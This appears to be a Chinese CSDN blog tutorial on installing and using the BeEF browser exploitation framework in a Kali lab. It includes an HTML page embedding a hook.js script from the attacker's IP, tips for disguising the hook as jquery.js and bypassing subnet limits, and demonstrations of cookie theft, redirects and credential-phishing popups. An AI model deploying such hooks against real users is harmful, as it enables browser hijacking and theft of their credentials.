kali之beef的使用

最新推荐文章于 2024-05-16 23:23:06 发布
最新推荐文章于 2024-05-16 23:23:06 发布
阅读量2.1w 收藏 130
点赞数 30
分类专栏: 工具使用 文章标签: beef
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whoim_i/article/details/102877616
版权

目录

一、beef介绍

BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。
beef也是属于c/s结构,具体看图
在这里插入图片描述zombie(僵尸)即受害的浏览器。zombie是被hook(勾连)的,如果浏览器访问了有勾子(由js编 写)的页面,就会被hook,勾连的浏览器会执行初始代码返回一些信息,接着zombie会每隔一段时间 (默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。BeEF服务器本质上就 像一个Web应用,被分为前端UI,和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录BeEF 的后台管理UI。

二、kali下使用beef

kali默认已经安装了beef,但是我的kali没有,我也不知道为什么0.0,那就自己装一个吧。命令:

apt install beef-xss

kali已经把beef-xss做成服务了,推荐使用systemctl 命令来启动或关闭beef服务器

systemctl start beef-xss.service  #开启beef 
systemctl stop beef-xss.service     #关闭beef 
systemctl restart beef-xss.service  #重启beef

配置beef

kali下的BeeF配置文件在 /usr/share/beef-xss/config.yaml,其它的配置文件也在这个目录的子目录 下,往后在使用某些功能时,需要修改对应的配置文件。自主安装的BeeF配置文件会在BeeF的主目录 下config.yaml,建议修改几个地方:

permitted_hooking_subnet: "0.0.0.0/0"     #指定某个网段,只有在这个网段的浏览器才能被hook
permitted_ui_subnet: "0.0.0.0/0"          #指定某个网段,只有在这个网段的浏览器才能访问管理UI
                            #上面这两项都是可以被绕过的,只要使用X-Forwarded-For首部绕过,一般不需要设置
host: "0.0.0.0"                           #设置beef服务器的主机, 如果有自己的域名, 那么可以设置自己的域名, 没有就使用默认
port: "3000"                              #设置beef服务器监听的端口, 可以自己定一个,比如8080, 记得端口号需要大于1024
xhr_poll_timeout: 1000                    #受害浏览器轮询beef主机的时间, 默认为1秒,可以设置为更低。
public: ""                                #public hostname/IP address 
public_port: ""                           #experimental 
                   # 这是让BeEF运行在一个反向代理或者NAT环境下才需要设置的。 
web_ui_basepath: "/ui"                    #管理页面的URI, 默认是/ui, 建议修改,这样就不会让别人找到你的管理页面
hook_file: "/hook.js"                     #hook_file 的名称, 建议修改, 可以修改为jquery.js之类的来提升隐蔽性
credentials: user: "beef" passwd: "beef"  #管理页面登录的用户名和密码, 这个一定要改,两个都改是最好的

实际操作

接下来实际使用BeEF,体验一下。首先修改监听的ip地址为kali的ip
在这里插入图片描述
开启BeEF服务器(可以命令行beef-xss打开或者应用程序打开),接着用浏览器访问管理页面http://192.168.133.131:3000/ui/panel, 使用设置的用户/密码登录。
在这里插入图片描述
接着访问有勾子的页面http://192.168.133.131:3000/demos/basic.html 这里的主机名和端口号要按照你设置的来修改, 这里要注意一下kali下beef版本的勾子不支持IE8,最新版或者旧一些的版本可以。所以要使用其他浏览器来访问有勾子的页面。
下面给出一个写有勾子的页面,把创建文件test.html,并把下面内容写到其中:

<html>
<head>
<script src='http://192.168.133.131:3000/hook.js'></script> <!-- 这里的主机和端口号,需要 和配置文件的一致。 --> 
</head> 
<body> Hello World </body> 
</html>

接着使用一个浏览器来打开,那么这个浏览器就会被hook了。 查看管理页面UI会是类似下面图:
在这里插入图片描述
接着我们就可以在commands里面进行各种操作了比如
获取cookie
在这里插入图片描述网页重定向
在这里插入图片描述社工弹窗
在这里插入图片描述
目标机页面
在这里插入图片描述
如果对方输入了信息,kali还能接收到。
在这里插入图片描述
在内部,BeEF可以检测出哪些命令模块可以在当前受害的浏览器工作, 并用颜色表示:
绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常
橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行
红色:命令模块不适用于此目标

本文所介绍技术仅供参考学习,切勿恶意用途

whoim_i
关注
  • 30
    点赞
  • 130
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
网安工具系列:kalibeef的基础使用
weixin_54626591的博客
04-07 883
kalibeef的基础使用
kali安装beef
deepdrill的博客
06-15 7007
kali安装beef 从源码安装 安装依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable 运行到这一步会出错,显示没有安装公钥 根据提示安装公钥 gpg --keyserver hkp://pool.sks-keyservers.net
kali,beef-xss安装及使用
m0_73581247的博客
06-22 1727
1.Beef工具 1.1 Beef工具介绍   Beef是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; Beef是基于Ruby语言编写的,并且支持图形化界面,操作简单。   新版的kail已经不自带beef工具了,需要自己下载。并且目前只支持macos和Linux系统。1.2 Beef工具安装   在安装beef工具之前建议更新一下源   apt-get update   apt-get install beef-xss 时间比较久,可以去放松一会   启
世一之详细之安装kali安装beef
atm7758258的博客
04-26 1359
kali安装beef常见操作,帮助排坑
kalibeef使用_kali没有beef(1)
最新发布
2401_82645688的博客
05-16 1039
BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。beef也是属于c/s结构,具体看图zombie(僵尸)即受害的浏览器。
KaliBeef使用教程
weixin_43287317的博客
04-02 5260
KaliBeef使用教程
Kali Linux-BeEF浏览器渗透框架
道阻且长,行则将至。
12-26 4660
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的 BeEF 渗透框架,通过一段编制好的JS代码控制目标主机 Win 7 虚拟机的浏览器,进而进行社会工程学攻击(发送钓鱼网页盗窃账户密码、恶意程序发送等)和其他攻击,同时演示借助 Win 7上搭建的DVWA靶场的存储型XSS漏洞自动触发JS攻击脚本(获取Cookie)。 环境说明 ...
kalibeef的安装
hjhwdwdw的博客
12-23 654
接着输入beef-xss打开beef,会让你输入新的密码,账号密码初始默认都为beef(输入密码的时候不可见)安装beef输入以下命令。修改密码后会自动登录。
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
beef获取目标主机用户名和密码.docx
03-29
* 访问 Beef:在 Kali 主机浏览器中输入 http://192.168.1.2:3000/ui/panel,访问 Beef。 * 钓鱼攻击:使用 Beef 的社会工程学攻击功能,例如 Pretty Theft,窃取目标主机的用户名和密码。 四、Beef 的社会工程学...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务100:存储型XSS和BEEF浏览器框架.mp4 │ 任务101:CSRF.mp4 │ 任务102:WEBSHELL.mp4 │ 任务103:HTTPS.mp4 │ 任务104:SSL、TLS中间人.mp4 │ 任务105:SSL、TLS拒绝服务和补充概念.mp4 │ ├─第14章 ...
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
在本课程中,我们将学习如何使用Beef与Metasploit框架协同工作,以实现对目标客户端的攻击。 首先,我们需要准备一个渗透测试环境,包括Kali Linux(作为渗透机)和多个Windows服务器及客户端。确保所有机器之间的...
BeefAuto:无需配置路由器即可自动化 Beef 以通过广域网使用
07-24
python脚本自动化牛肉并通过使用ngrok打开端口将其配置为使用overwan 截图 安装 [ 卡利 ] git 克隆 cd BeefAuto 须藤 pip3 install -r requirements.txt 须藤 bash install.sh 须藤 python3 main.py 经过以下...
kalibeef使用_kali没有beef,网络安全开发基础培训
2301_76223496的博客
04-17 934
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接着访问有勾子的页面http://192.168.133.131:3000/demos/basic.html 这里的主机名和端口号要按照你设置的来修改, 这里要注意一下kalibeef版本的勾子不支持IE8,最新版或者旧一些的版本可以。④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
kali 中安装 beef-xss
挖到0day了吗?
02-27 680
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。beef是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。本文将介绍安装beef。新版的kail已经不自带beef工具了,需要自己下载。
xss利用之kali神器beef
热门推荐
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEFKali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
BeEF-XSS实验手记
二歪的防痴呆笔记
04-02 2297
这里使用的是Kali里面预装的BeEF-XSS,在Kali里面打开 应用程序-08-漏洞利用工具集-beef XSS framework。 或者直接运行beef-xss命令运行: kali已经把beef-xss做成服务了,可以使用systemctl 命令来启动或关闭beef服务器 systemctl start beef-xss.service #开启beef systemctl sto...
Kali BeEF MSF的使用
baynk的博客
05-14 1504
0x00 BeEF BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,是由ruby语言开发的专门针对浏览器攻击的框架。BeeF是前欧美最流行的web框架攻击平台,kali 集成BeEf,而且BeEf有很多好使的payload。例如BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机。 不过在目前,BeEF使用的人比较少,
Kali BeEF-XSS使用
nlj1860453的博客
01-08 453
kali终端输入“beef-xss”,显示没有安装。回车它会提示是否安装,输入y,等待安装完毕。
kali beef安装
07-25
要在Kali Linux上安装BeEF(Browser Exploitation Framework),您可以按照以下步骤进行操作: 1. 打开终端并更新系统: ``` sudo apt update sudo apt upgrade ``` 2. 安装Ruby开发环境: ``` sudo apt install ruby ruby-dev ``` 3. 安装必要的依赖项: ``` sudo apt install build-essential libsqlite3-dev zlib1g-dev ``` 4. 安装BeEF: ``` sudo gem install beef ``` 5. 启动BeEF: ``` beef-xss ``` 6. 打开Web浏览器并访问 `http://localhost:3000/ui/panel`,这将打开BeEF的管理界面。 请注意,BeEF是一个强大的工具,仅限于合法和道德的目的使用。滥用此工具可能会违反法律和道德准则,请确保仅在合法和授权的环境中使用
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值